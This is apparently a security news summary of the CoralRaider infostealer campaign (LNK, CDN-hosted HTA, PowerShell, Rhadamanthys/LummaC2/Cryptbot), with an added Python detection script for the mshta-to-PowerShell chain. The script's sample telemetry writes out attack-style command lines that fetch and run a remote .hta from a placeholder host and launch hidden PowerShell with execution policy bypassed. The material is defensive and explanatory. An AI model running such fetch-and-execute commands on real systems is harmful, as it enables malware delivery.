BleepingComputer reports that systems in the U.S., Germany, Japan, and the UK have been subjected to ongoing attacks by the suspected Vietnamese hacking group CoralRaider, which leverages a content delivery network cache to deploy information-stealing payloads.
According to a Cisco Talos report, intrusions begin with the delivery of an archive containing a malicious .LNK file; when opened, it runs an HTML Application (HTA) file retrieved from a subdomain of a CDN platform, which helps the download evade detection. The HTA then runs a PowerShell decrypter script designed to evade Windows Defender before deploying the Rhadamanthys, LummaC2, or Cryptbot infostealers.
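The chain described above (LNK opened from an archive, mshta.exe pulling an .hta from a CDN-hosted URL, then a PowerShell child) is a behavioural pattern a defender can look for in endpoint process-creation telemetry regardless of which CDN subdomain is used. The following Python script is an added example and is not code from the BleepingComputer or Cisco Talos reporting; the Sysmon-style events, host names and paths in it are constructed placeholders, not indicators from the campaign.

```python
"""Added detection example (not from the original report).

Walks a list of process-creation events (Sysmon Event ID 1-style fields,
constructed here) and flags the chain: mshta.exe launched with a remote .hta
URL -> powershell.exe child. The originating .LNK is not visible as a process,
so the detection keys on the mshta/PowerShell behaviour the article describes.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str    # command line as logged


# Constructed sample telemetry. The CDN-style host below is a placeholder
# (.invalid TLD), not a real indicator from the campaign.
SAMPLE_EVENTS = [
    ProcEvent(100, 1,   r"C:\Windows\explorer.exe", "explorer.exe"),
    # user opens the .LNK from the archive; the shortcut target is cmd -> mshta
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c start "" mshta.exe https://assets.example-cdn.invalid/loader.hta'),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://assets.example-cdn.invalid/loader.hta"),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -ep bypass -f C:\\Users\\Public\\stage.ps1"),
    # benign: an admin tool runs a local HTA and opens notepad
    ProcEvent(500, 100, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Tools\inventory.hta"),
    ProcEvent(600, 500, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

REMOTE_HTA = re.compile(r"https?://\S+?\.hta\b", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(event: ProcEvent, by_pid: dict) -> list:
    """Return process image names from the root ancestor down to `event`."""
    chain, seen, cur = [], set(), event
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return list(reversed(chain))


def find_remote_hta_chains(events: list) -> list:
    """Flag mshta.exe executing a remote .hta that then spawns powershell.exe."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if basename(e.image) != "mshta.exe":
            continue
        m = REMOTE_HTA.search(e.cmdline)
        if not m:
            continue  # local .hta files are common in admin tooling; not flagged alone
        for child in events:
            if child.ppid != e.pid or basename(child.image) != "powershell.exe":
                continue
            hits.append({
                "mshta_pid": e.pid,
                "hta_url": m.group(0),
                "powershell_pid": child.pid,
                "hidden_window": bool(HIDDEN_WINDOW.search(child.cmdline)),
                "ancestry": ancestry(e, by_pid),
            })
    return hits


if __name__ == "__main__":
    for hit in find_remote_hta_chains(SAMPLE_EVENTS):
        print(hit)
```

The rule deliberately requires both a remote URL in the mshta.exe command line and a PowerShell child, so a locally run HTA (pid 500 above) does not fire; the `ancestry` field is included because the explorer.exe -> cmd.exe -> mshta.exe lineage is what distinguishes a user double-clicking a shortcut from a scheduled task or service launching the same binary. Because the payload host is a shared CDN platform, blocking the domain is rarely practical, which is why the detection keys on process behaviour rather than on the host name.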
Further examination revealed that CoralRaider is using newer versions of the Rhadamanthys and LummaC2 malware, as well as an enhanced version of Cryptbot with a broader set of targets in addition to improved anti-analysis and obfuscation techniques. The attacks in this campaign have been associated with CoralRaider because their tactics, techniques, and procedures match those observed in the group's previous attacks.